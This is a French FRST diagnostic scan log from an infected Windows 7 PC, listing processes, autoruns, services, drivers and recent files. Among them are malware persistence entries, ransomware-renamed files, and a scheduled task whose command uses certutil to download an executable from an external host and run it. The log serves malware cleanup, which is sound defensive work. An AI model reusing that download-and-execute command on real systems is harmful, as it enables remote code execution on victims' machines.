Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 15-11-2020 Exécuté par Mohand (administrateur) sur SERVEUR_PPC (Acer Veriton M275) (15-11-2020 19:17:34) Exécuté depuis C:\Users\Mohand\Downloads Profils chargés: Mohand Platform: Windows 7 Home Premium Service Pack 1 (X64) Langue: Français (France) Navigateur par défaut: Chrome Mode d'amorçage: Normal Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processus (Avec liste blanche) ================= (Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.) () [Fichier non signé] C:\Users\Mohand\Downloads\RAV.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.32\GoogleCrashHandler.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.32\GoogleCrashHandler64.exe (Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <13> (Microsoft Corporation -> Microsoft Corporation) C:\Windows\vVX3000.exe (Realtek Semiconductor Corp -> ) C:\Windows\runSW.exe (Realtek Semiconductor Corp -> Realtek) C:\Windows\SwUSB.exe (SOSVIRUS (LE BOZEC CEDRIC, DOMINIQUE, MARIE) -> ) C:\Program Files (x86)\UsbFix\Modules\UsbFixMonitor.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe ==================== Registre (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.) HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [328048 2011-01-21] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) HKLM\...\Run: [VX3000] => C:\Windows\vVX3000.exe [762736 2010-05-20] (Microsoft Corporation -> Microsoft Corporation) HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [331064 2020-10-16] (Apple Inc. -> Apple Inc.) HKLM-x32\...\Run: [CaptureOnTouch] => C:\Program Files (x86)\Canon Electronics\CaptureOnTouch\TouchDR.exe [3021568 2019-04-22] (CANON ELECTRONICS INC -> Canon Electronics Inc.) HKLM-x32\...\RunOnce: [] => [X] HKU\S-1-5-21-797786222-1184712476-1312605968-1000\...\Run: [DivineFog] => C:\Windows\rss\csrss.exe [4024320 2020-11-02] () [Fichier non signé] <==== ATTENTION HKU\S-1-5-21-797786222-1184712476-1312605968-1000\...\Run: [CloudNet] => C:\Users\Mohand\AppData\Roaming\a497077cbc56\a497077cbc56.exe [549376 2020-11-03] () [Fichier non signé] <==== ATTENTION HKU\S-1-5-21-797786222-1184712476-1312605968-1000\...\Run: [ares] => "C:\Program Files (x86)\Ares\Ares.exe" -h HKU\S-1-5-21-797786222-1184712476-1312605968-1000\...\Policies\Explorer: [NoFind] 0 HKLM\...\Windows x64\Print Processors\hpzpplhn: C:\Windows\System32\spool\prtprocs\x64\hpzpplhn.dll [99840 2008-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Hewlett-Packard Corporation) HKLM\...\Print\Monitors\KM Language Monitor: C:\Windows\system32\KMPJL64.DLL [125232 2019-08-22] (Microsoft Windows Hardware Compatibility Publisher -> KYOCERA Document Solutions Inc.) HKLM\...\Print\Monitors\KX Language Monitor: C:\Windows\system32\KXPLM64.DLL [100352 2015-09-11] (Microsoft Windows Hardware Compatibility Publisher -> KYOCERA Document Solutions Inc.) HKLM\...\Print\Monitors\PJL Language Monitor: C:\Windows\system32\PJLMON.DLL [22016 2010-11-21] (Microsoft Windows -> Microsoft Corporation) HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\86.0.4240.193\Installer\chrmstp.exe [2020-11-10] (Google LLC -> Google LLC) HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION ==================== Tâches planifiées (Avec liste blanche) ============ (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {120FEE0C-50F4-4397-96EB-02514BA76E7A} - System32\Tasks\UsbFix Boot Scan => C:\Program Files (x86)\UsbFix\UsbFix.exe [2053256 2020-08-02] (SOSVIRUS (LE BOZEC CEDRIC, DOMINIQUE, MARIE) -> ) Task: {1C80F9EA-8437-46C3-BCCA-7B871E168173} - \csrss -> Pas de fichier <==== ATTENTION Task: {323F6B05-746E-4479-88A4-65B9308363B5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1341008 2020-09-06] (Adobe Inc. -> Adobe Inc.) Task: {37329927-67DB-4E40-A137-7571FAB305D3} - System32\Tasks\BlueStacksHelper => C:\ProgramData\BlueStacks\Client\Helper\BlueStacksHelper.exe [752136 2020-10-16] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.) Task: {5AE0248B-E2DE-415F-9BBE-7F523216443C} - System32\Tasks\UsbFix Monitor => C:\Program Files (x86)\UsbFix\Modules\UsbFixMonitor.exe [1239176 2020-08-02] (SOSVIRUS (LE BOZEC CEDRIC, DOMINIQUE, MARIE) -> ) Task: {6C5E932F-EC10-4258-8C78-AD00DABDEC35} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-11-06] (Google LLC -> Google LLC) Task: {C159C071-7B11-4897-B7BC-5453554CDB01} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-11-06] (Google LLC -> Google LLC) Task: {CFDB67CA-711B-402F-A2B9-4CFEF863FEB0} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Mohand\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Mohand\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://babsitef.com/app/app.exe C:\Users\Mohand\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Mohand\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION Task: {F46FC72A-4232-4B90-862D-D0BF4DE757DF} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616832 2019-09-04] (Apple Inc. -> Apple Inc.) (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) ==================== Internet (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.) Winsock: Catalog5 07 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.) Winsock: Catalog5-x64 07 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.) Tcpip\..\Interfaces\{16ABF730-1412-484B-9933-80E068FF9135}: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{898987E4-E015-47B0-8740-224B603CD6C5}: [NameServer] 192.168.1.1 HKLM\System\...\Parameters\PersistentRoutes: [0.0.0.0,0.0.0.0,192.168.1.1,-1] FireFox: ======== FF Plugin: @microsoft.com/GENUINE -> disabled [Pas de fichier] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Pas de fichier] FF Plugin-x32: @videolan.org/vlc,version=2.0.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2012-03-17] (VideoLAN) [Fichier non signé] FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-10-22] (Adobe Inc. -> Adobe Systems Inc.) Chrome: ======= CHR Profile: C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default [2020-11-15] CHR Notifications: Default -> hxxps://best.aliexpress.com; hxxps://usersdrive.com; hxxps://www.lemonde.fr CHR Extension: (Slides) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-11-06] CHR Extension: (Docs) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-11-06] CHR Extension: (Google Drive) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-11-06] CHR Extension: (YouTube) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-11-06] CHR Extension: (Sheets) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-11-06] CHR Extension: (Google Docs hors connexion) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-11-06] CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-11-06] CHR Extension: (Gmail) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-11-06] CHR Extension: (Chrome Media Router) - C:\Users\Mohand\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-11-06] ==================== Services (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169544 2020-09-06] (Adobe Inc. -> Adobe Inc.) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2020-09-24] (Apple Inc. -> Apple Inc.) R2 RunSwUSB; C:\Windows\runSW.exe [44760 2014-12-15] (Realtek Semiconductor Corp -> ) R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation) R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== ATTENTION (zéro octet Fichier/Dossier) S2 MSCamSvc; "C:\Program Files\Microsoft LifeCam\MSCamS64.exe" [X] ===================== Pilotes (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R2 BlueStacksDrv; C:\Program Files\BlueStacks\BstkDrv_bgp.sys [315976 2019-12-12] (Bluestack Systems, Inc -> Bluestack System Inc.) S3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [5086464 2016-04-05] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation) S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2020-04-15] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.) R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zéro octet Fichier/Dossier) R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier) R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-11-02] (WDKTestCert Admin,131666266076831434 -> ) [Fichier non signé] ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois (créés) =================== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2020-11-15 19:17 - 2020-11-15 19:18 - 000011828 _____ C:\Users\Mohand\Downloads\FRST.txt 2020-11-15 19:16 - 2020-11-15 19:18 - 000000000 ____D C:\FRST 2020-11-15 19:15 - 2020-11-15 19:15 - 002294784 _____ (Farbar) C:\Users\Mohand\Downloads\FRST64.exe 2020-11-15 19:09 - 2020-11-15 19:14 - 000001887 _____ C:\Users\Public\Desktop\UsbFix Anti-Malware.lnk 2020-11-15 19:09 - 2020-11-15 19:14 - 000001887 _____ C:\ProgramData\Desktop\UsbFix Anti-Malware.lnk 2020-11-15 19:09 - 2020-11-15 19:09 - 000003206 _____ C:\Windows\system32\Tasks\UsbFix Monitor 2020-11-15 19:09 - 2020-11-15 19:09 - 000003204 _____ C:\Windows\system32\Tasks\UsbFix Boot Scan 2020-11-15 18:25 - 2020-11-15 18:25 - 002276352 _____ () C:\Users\Mohand\Downloads\RAV.exe 2020-11-15 18:11 - 2020-11-15 19:09 - 000000000 ____D C:\Program Files (x86)\UsbFix 2020-11-15 18:11 - 2020-11-15 18:11 - 005355288 _____ (SOSVirus) C:\Users\Mohand\Downloads\UsbFix_2020.exe 2020-11-15 18:05 - 2020-11-15 18:05 - 000000000 ____D C:\Rem-VBSqt 2020-11-15 18:02 - 2020-11-15 18:08 - 000000000 ____D C:\Users\Mohand\Downloads\Rem-VBSworm 2020-11-15 18:02 - 2020-11-15 18:02 - 000062792 _____ C:\Users\Mohand\Downloads\Rem-VBSworm.zip 2020-11-13 17:20 - 2020-11-15 18:37 - 592577300 _____ C:\Users\Mohand\Downloads\iPhone_4.7_P3_14.2_18B92_Restore.ipsw 2020-11-12 13:49 - 2020-11-12 13:50 - 000012735 _____ C:\Users\Mohand\Downloads\[Torrentz2k.xyz]__100.Years.3D.Film.SBS.[1080p].m2ts.torrent 2020-11-12 13:35 - 2020-11-12 13:36 - 000000000 ____D C:\Users\Mohand\Documents\logiciel 2020-11-11 14:24 - 2020-11-15 19:05 - 000000000 ____D C:\Program Files (x86)\Tenorshare ReiBoot 2020-11-09 15:55 - 2020-11-09 15:55 - 000001197 _____ C:\Users\Public\Desktop\iMyFone LockWiper.lnk 2020-11-09 15:55 - 2020-11-09 15:55 - 000001197 _____ C:\ProgramData\Desktop\iMyFone LockWiper.lnk 2020-11-09 15:55 - 2020-11-09 15:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iMyFone LockWiper 2020-11-09 15:55 - 2020-11-09 15:55 - 000000000 ____D C:\Program Files (x86)\activated 2020-11-09 15:49 - 2020-11-12 13:50 - 000000000 ____D C:\Users\Mohand\Documents\Vuze Downloads 2020-11-09 15:49 - 2020-11-09 15:49 - 000001794 _____ C:\Users\Public\Desktop\Vuze.lnk 2020-11-09 15:49 - 2020-11-09 15:49 - 000001794 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vuze.lnk 2020-11-09 15:49 - 2020-11-09 15:49 - 000001794 _____ C:\ProgramData\Desktop\Vuze.lnk 2020-11-09 15:49 - 2020-11-09 15:49 - 000000000 ____D C:\Program Files\Vuze 2020-11-09 15:47 - 2020-11-09 15:47 - 000091808 _____ (Azureus Software, Inc.) C:\Users\Mohand\Downloads\vuze_5-7-6-0_fr_11926.exe 2020-11-08 20:08 - 2020-11-08 20:08 - 000000000 ____D C:\Users\Mohand\AppData\Roaming\SPTemp 2020-11-08 17:24 - 2020-11-09 15:45 - 000000000 ____D C:\Program Files (x86)\Ares 2020-11-08 17:24 - 2020-11-08 17:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ares 2020-11-08 17:05 - 2020-11-09 15:55 - 000000000 ____D C:\Program Files (x86)\iMyFone 2020-11-08 17:03 - 2020-11-08 17:03 - 000000000 ____D C:\Program Files (x86)\imyfone_down 2020-11-08 16:49 - 2020-11-08 16:49 - 000000000 ____D C:\Users\Mohand\AppData\Local\Apple Computer 2020-11-08 16:43 - 2020-11-08 16:50 - 000000000 ____D C:\Users\Mohand\AppData\Roaming\Apple Computer 2020-11-08 16:40 - 2020-11-08 16:40 - 000001747 _____ C:\Users\Public\Desktop\iTunes.lnk 2020-11-08 16:40 - 2020-11-08 16:40 - 000001747 _____ C:\ProgramData\Desktop\iTunes.lnk 2020-11-08 16:40 - 2020-11-08 16:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes 2020-11-08 16:40 - 2020-11-08 16:40 - 000000000 ____D C:\Program Files\iPod 2020-11-08 16:39 - 2020-11-08 16:40 - 000000000 ____D C:\Program Files\iTunes 2020-11-08 16:39 - 2020-11-08 16:39 - 000000000 ____D C:\ProgramData\Apple Computer 2020-11-08 16:38 - 2020-11-08 16:38 - 000002519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk 2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\Windows\system32\Tasks\Apple 2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\Users\Mohand\AppData\Local\Apple 2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\ProgramData\Apple 2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\Program Files\Common Files\Apple 2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\Program Files\Bonjour 2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\Program Files (x86)\Bonjour 2020-11-08 16:38 - 2020-11-08 16:38 - 000000000 ____D C:\Program Files (x86)\Apple Software Update 2020-11-07 17:11 - 2020-11-07 17:11 - 000000522 ___SH C:\Users\Public\Documents\desktop.ini.id-306C8A3D.[pexdatax@gmail.com].ROGER 2020-11-07 17:11 - 2020-11-07 17:11 - 000000522 ___SH C:\ProgramData\Documents\desktop.ini.id-306C8A3D.[pexdatax@gmail.com].ROGER 2020-11-07 17:11 - 2020-11-07 17:11 - 000000410 ___SH C:\Users\Public\Downloads\desktop.ini.id-306C8A3D.[pexdatax@gmail.com].ROGER 2020-11-07 17:11 - 2020-11-07 17:11 - 000000410 ___SH C:\Users\Public\desktop.ini.id-306C8A3D.[pexdatax@gmail.com].ROGER 2020-11-06 19:39 - 2020-11-06 19:39 - 000001066 _____ C:\Users\Mohand\Desktop\VLC media player.lnk 2020-11-06 16:53 - 2020-11-06 16:53 - 000000000 ____D C:\Users\Mohand\.swt 2020-11-06 16:52 - 2020-11-12 19:35 - 000000000 ____D C:\Users\Mohand\AppData\Roaming\Azureus 2020-11-06 16:51 - 2020-11-06 16:51 - 000000000 ____D C:\ProgramData\Oracle 2020-11-06 16:35 - 2020-11-10 10:29 - 000002168 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2020-11-06 16:35 - 2020-11-10 10:29 - 000002127 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2020-11-06 16:35 - 2020-11-10 10:29 - 000002127 _____ C:\ProgramData\Desktop\Google Chrome.lnk 2020-11-06 16:33 - 2020-11-06 16:39 - 000003502 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA 2020-11-06 16:33 - 2020-11-06 16:39 - 000003374 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore 2020-11-04 18:08 - 2020-11-04 18:08 - 000000000 ____D C:\Tenorshare 2020-11-04 17:17 - 2020-11-04 18:12 - 000000000 ____D C:\Program Files (x86)\02ex9jo83dlt 2020-11-04 17:16 - 2020-11-04 17:16 - 000002059 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk 2020-11-04 17:16 - 2020-11-04 17:16 - 000002047 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk 2020-11-04 17:16 - 2020-11-04 17:16 - 000002047 _____ C:\ProgramData\Desktop\Acrobat Reader DC.lnk 2020-11-03 10:17 - 2020-11-03 10:17 - 000000000 ____D C:\Users\Mohand\AppData\Roaming\a497077cbc56 2020-11-02 19:41 - 2020-11-02 19:41 - 000000000 ____D C:\Program Files (x86)\gdiview 2020-11-02 19:34 - 2020-11-02 19:34 - 399973115 _____ C:\Windows\MEMORY.DMP 2020-11-02 19:34 - 2020-11-02 19:34 - 000276800 _____ C:\Windows\Minidump\110220-40310-01.dmp 2020-11-02 19:34 - 2020-11-02 19:34 - 000000000 ____D C:\Windows\Minidump 2020-11-02 19:31 - 2020-11-02 19:41 - 000000000 ____D C:\Program Files (x86)\ti1ny7mqy2p4 2020-11-02 19:31 - 2020-11-02 19:31 - 000000000 ____D C:\ProgramData\sib 2020-11-02 19:29 - 2020-11-02 19:29 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys 2020-11-02 19:28 - 2020-11-15 10:33 - 000003494 _____ C:\Windows\system32\Tasks\ScheduledUpdate 2020-11-02 19:28 - 2020-11-02 19:29 - 005553888 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe 2020-11-02 19:28 - 2020-11-02 19:29 - 000629984 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe 2020-10-30 11:10 - 2020-10-30 11:09 - 000035385 _____ C:\Users\Mohand\Desktop\30-10-2020-attestation-de-deplacement-derogatoire.pdf 2020-10-29 18:17 - 2020-10-29 18:17 - 000043997 _____ C:\Users\Mohand\Desktop\atestation profetionel.pdf 2020-10-29 16:19 - 2020-10-29 16:19 - 000620596 _____ C:\Users\Mohand\Downloads\21-09-2020-attestation-de-deplacement-vers-la-france-metropolitaine.pdf 2020-10-25 17:45 - 2020-10-25 17:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UTAX TA 2020-10-25 16:43 - 2020-10-25 16:43 - 000001086 _____ C:\Users\Mohand\Desktop\Your Unin-staller!.lnk 2020-10-25 16:43 - 2020-10-25 16:43 - 000000000 ____D C:\Users\Mohand\AppData\Roaming\URSoft 2020-10-25 16:43 - 2020-10-25 16:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Your Uninstaller 2010 2020-10-25 16:43 - 2020-10-25 16:43 - 000000000 ____D C:\Program Files (x86)\Your Uninstaller 2010 2020-10-20 16:09 - 2020-10-20 16:09 - 000000000 ____D C:\Program Files\Google 2020-10-19 16:47 - 2015-09-11 09:32 - 000100352 _____ (KYOCERA Document Solutions Inc.) C:\Windows\system32\KXPLM64.DLL 2020-10-19 16:42 - 2020-11-15 19:04 - 000000000 ____D C:\ProgramData\temp ==================== Un mois (modifiés) ================== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2020-11-15 18:22 - 2011-04-12 10:16 - 000746916 _____ C:\Windows\system32\perfh00C.dat 2020-11-15 18:22 - 2011-04-12 10:16 - 000149440 _____ C:\Windows\system32\perfc00C.dat 2020-11-15 18:22 - 2009-07-14 06:13 - 001667292 _____ C:\Windows\system32\PerfStringBackup.INI 2020-11-15 18:22 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf 2020-11-15 10:41 - 2009-07-14 05:45 - 000032064 _____ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2020-11-15 10:41 - 2009-07-14 05:45 - 000032064 _____ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2020-11-15 10:33 - 2020-01-17 10:32 - 000000000 ____D C:\Program Files (x86)\TeamViewer 2020-11-15 10:33 - 2009-07-14 06:08 - 000032496 _____ C:\Windows\Tasks\SCHEDLGU.TXT 2020-11-15 10:33 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2020-11-11 14:51 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\LiveKernelReports 2020-11-07 17:13 - 2011-04-12 10:27 - 000000000 ___RD C:\Users\Public\Recorded TV 2020-11-07 17:11 - 2020-02-26 17:20 - 000000000 ____D C:\Users\Public\BlueStacks 2020-11-07 17:11 - 2009-07-14 04:20 - 000000000 __RHD C:\Users\Public\Libraries 2020-11-06 16:53 - 2020-01-14 12:41 - 000000000 ____D C:\Users\Mohand 2020-11-06 16:33 - 2020-01-15 13:31 - 000000000 ____D C:\Program Files (x86)\Google 2020-11-06 16:26 - 2020-01-14 12:41 - 000001429 _____ C:\Users\Mohand\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2020-11-04 17:18 - 2020-01-15 20:34 - 000000000 ____D C:\Users\Mohand\AppData\Local\Adobe 2020-11-04 17:17 - 2020-05-01 12:57 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task 2020-11-04 17:14 - 2020-01-15 15:08 - 000000000 ____D C:\ProgramData\Adobe 2020-11-04 16:54 - 2020-01-14 18:50 - 000000000 ____D C:\Users\Mohand\AppData\Local\Google 2020-11-02 19:52 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\system32\NDF 2020-10-29 23:06 - 2010-11-21 04:27 - 000795000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe 2020-10-29 10:11 - 2020-04-13 08:40 - 000249466 _____ C:\Windows\ntbtlog.txt 2020-10-28 19:08 - 2020-01-14 12:42 - 000138912 _____ C:\Users\Mohand\AppData\Local\GDIPFONTCACHEV1.DAT 2020-10-25 18:49 - 2009-07-14 05:45 - 000526168 _____ C:\Windows\system32\FNTCACHE.DAT 2020-10-25 17:45 - 2020-01-16 16:43 - 000000000 ____D C:\Program Files\UTAX TA 2020-10-19 16:43 - 2020-01-16 16:48 - 000000000 ____D C:\Users\Mohand\AppData\Local\ElevatedDiagnostics 2020-10-19 09:49 - 2020-02-26 17:46 - 000003872 _____ C:\Windows\system32\Tasks\BlueStacksHelper ==================== SigCheck ============================ (Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.) BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restauré(es) avec succès LastRegBack: 2020-11-13 10:51 ==================== Fin de FRST.txt ========================